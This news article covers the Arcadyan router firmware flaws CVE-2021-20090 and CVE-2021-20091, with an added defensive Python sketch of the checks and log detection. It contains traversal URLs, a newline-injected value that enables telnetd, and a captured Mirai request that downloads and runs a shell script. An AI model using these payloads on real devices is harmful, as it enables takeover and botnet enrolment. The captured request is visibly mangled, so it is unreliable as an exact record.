Vulnerability in home routers affecting 17 manufacturers

A large-scale attack has been reported on the network against home routers whose firmware uses the HTTP server implementation from the company Arcadyan. To gain control over the devices, a combination of two vulnerabilities is used that allows specially crafted code to be executed with root privileges. The problem affects a fairly wide range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices supplied under the Beeline (the problem is confirmed on the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operator brands. It is noted that the problem has been present in the Arcadyan firmware for more than 10 years and during that time has managed to migrate to at least 20 device models from 17 different manufacturers.

The first vulnerability, CVE-2021-20090, makes it possible to reach any script of the web interface without authentication. The essence of the vulnerability is that in the web interface some directories, those from which images, CSS files and JavaScript scripts are served, are accessible without authentication. The directories that may be accessed without authentication are checked by a prefix mask. Specifying the characters "../" in a path to move to the parent directory is blocked by the firmware, but the combination "..%2f" is let through. Thus, protected pages can be opened by sending requests such as "http://192.168.1.1/images/..%2findex.htm".

The second vulnerability, CVE-2021-20091, allows an authenticated user to change the system settings of the device by sending specially formatted parameters to the apply_abstract.cgi script, which does not check the parameters for the presence of a newline character. For example, when performing a ping operation, an attacker can specify the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field holding the IP address to be checked, and the script, when creating the settings file /tmp/etc/config/.glbcfg, will write the line "AARC_SYS_TelnetdEnable=1" into it, which enables the telnetd daemon and thereby provides unrestricted shell access with root privileges. Similarly, by setting the AARC_SYS parameter, any code can be executed on the system. The first vulnerability makes it possible to run the problematic script without authentication by accessing it as "/images/..%2fapply_abstract.cgi".
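As an added illustration (not code from this article or from Arcadyan), the following models the flawed prefix check behind CVE-2021-20090 next to a hardened version that decodes and canonicalises the path before deciding, plus the input validation missing in CVE-2021-20091; the public directory names other than /images/ and the access-log lines are constructed for the example, and the detection function flags only requests that the weak check accepts but the hardened one rejects.

```python
import ipaddress
import posixpath
from urllib.parse import unquote

# Directories served without authentication; /images/ is from the article, the rest assumed.
PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")

def vulnerable_is_public(path: str) -> bool:
    """Reconstruction of the flawed pattern: raw path prefix-matched, only literal '../' refused."""
    return "../" not in path and path.startswith(PUBLIC_PREFIXES)

def hardened_is_public(path: str) -> bool:
    """Percent-decode (bounded, to catch nested encoding), canonicalise, then prefix-match."""
    decoded = path
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\\" in decoded or "\x00" in decoded:
        return False
    canonical = posixpath.normpath(decoded)  # collapses '..' segments
    return canonical.startswith(PUBLIC_PREFIXES)

def safe_ping_target(value: str):
    """A field written into a key=value config file must be a bare IPv4 address; anything else is None."""
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in value):  # rejects %0A once decoded, and all control chars
        return None
    try:
        return str(ipaddress.IPv4Address(value))
    except ValueError:
        return None

SAMPLE_LOG = [  # constructed access-log lines, not real captures
    '192.168.1.50 "GET /images/logo.png HTTP/1.1" 200',
    '192.168.1.50 "GET /images/..%2findex.htm HTTP/1.1" 200',
    '203.0.113.9 "POST /images/..%2fapply_abstract.cgi HTTP/1.1" 200',
    '192.168.1.50 "GET /index.htm HTTP/1.1" 401',
]

def traversal_attempts(lines):
    """Paths the prefix-only check would serve unauthenticated but that resolve outside the public directories."""
    paths = [line.split('"')[1].split()[1] for line in lines]
    return [p for p in paths if vulnerable_is_public(p) and not hardened_is_public(p)]
```

Running traversal_attempts over a real access log is a cheap retrospective check for this bypass pattern on any device that exposes similar unauthenticated static directories.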

To exploit the vulnerabilities, the attacker must be able to send a request to the network port on which the web interface is running. Judging by the pace at which the attack is spreading, many operators leave their devices reachable from the external network to simplify troubleshooting by the support service. If access to the web interface is restricted to the internal network only, the attack can still be carried out from an external network using the "DNS rebinding" technique. The vulnerabilities are already being actively exploited to enrol routers in the Mirai botnet:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC=212.192.241.7_ping0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Source: opennet.ru
